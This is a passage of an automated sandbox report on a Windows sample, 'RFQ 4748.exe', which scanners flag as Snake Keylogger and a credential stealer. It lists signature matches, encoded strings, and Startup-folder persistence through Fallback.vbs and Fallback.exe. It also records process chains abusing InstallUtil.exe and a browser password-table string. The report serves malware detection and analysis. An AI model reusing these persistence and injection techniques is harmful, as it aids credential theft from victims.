                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePboipecgady.exe8 vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAworjf.dll" vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000000.2024179375.0000000000A42000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamePboipecgady.exe8 vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2104276177.0000000006910000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAworjf.dll" vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2103664815.00000000060E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePboipecgady.exe8 vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003E38000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2105699680.0000000006C60000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2089151863.0000000002E87000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs RFQ 4748.exe
                  Source: RFQ 4748.exe Binary or memory string: OriginalFilenamePboipecgady.exe8 vs RFQ 4748.exe
                  Source: RFQ 4748.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000005.00000002.2303227720.000000000440D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.4492614618.0000000000408000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: InstallUtil.exe PID: 360, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: InstallUtil.exe PID: 3652, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: RFQ 4748.exe, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: Fallback.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, Rt-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: RFQ 4748.exe, -.csBase64 encoded string: 'h/9JrGQ0+tRfvm08t/JTt293lfVJvWw7uP8Bn2QtkehOqngYp/VftWM1rb1dvXUGkvNWtE84ueMBt3EGnehfqXQ4uO9OoTo+sfJllGQ3s/JS40Y8oNJDqGQfpulXkGA3sOpf42Y8oNl0uWw8789UvGQhm+ABimQ4sNVOqmg3s717vGVis+NOh1E2p+9OsW437+FfrF4aofRIvW8tkOlXuWg379VfrEU4oOcB6jhs4bQBmXIqsetYtHgKsfRMvXNih+9XqG08lfVJvWw7uP9/oHE1u/Rfqjo7teRftHc07/VXt2o8oONJrA=='
                  Source: Fallback.exe.0.dr, -.csBase64 encoded string: 'h/9JrGQ0+tRfvm08t/JTt293lfVJvWw7uP8Bn2QtkehOqngYp/VftWM1rb1dvXUGkvNWtE84ueMBt3EGnehfqXQ4uO9OoTo+sfJllGQ3s/JS40Y8oNJDqGQfpulXkGA3sOpf42Y8oNl0uWw8789UvGQhm+ABimQ4sNVOqmg3s717vGVis+NOh1E2p+9OsW437+FfrF4aofRIvW8tkOlXuWg379VfrEU4oOcB6jhs4bQBmXIqsetYtHgKsfRMvXNih+9XqG08lfVJvWw7uP9/oHE1u/Rfqjo7teRftHc07/VXt2o8oONJrA=='
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, ---.csBase64 encoded string: 'tDysr3FCpidoAN5BPVVKGAzRN9Rq8atHi4KbgoyHr59UUHCLtjp9nj46vEtJy/aB'
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                  Source: C:\Users\user\Desktop\RFQ 4748.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                  Source: RFQ 4748.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: RFQ 4748.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\RFQ 4748.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: InstallUtil.exe, 00000002.00000002.4496477218.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4500789496.0000000003C3A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4500600689.000000000399B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002B8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RFQ 4748.exeReversingLabs: Detection: 31%
                  Source: C:\Users\user\Desktop\RFQ 4748.exeFile read: C:\Users\user\Desktop\RFQ 4748.exe
                  Source: unknownProcess created: C:\Users\user\Desktop\RFQ 4748.exe "C:\Users\user\Desktop\RFQ 4748.exe"
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Fallback.exe "C:\Users\user\AppData\Roaming\Fallback.exe"
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: version.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: rasman.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\RFQ 4748.exeSection loaded: ondemandconnroutehelper.dll
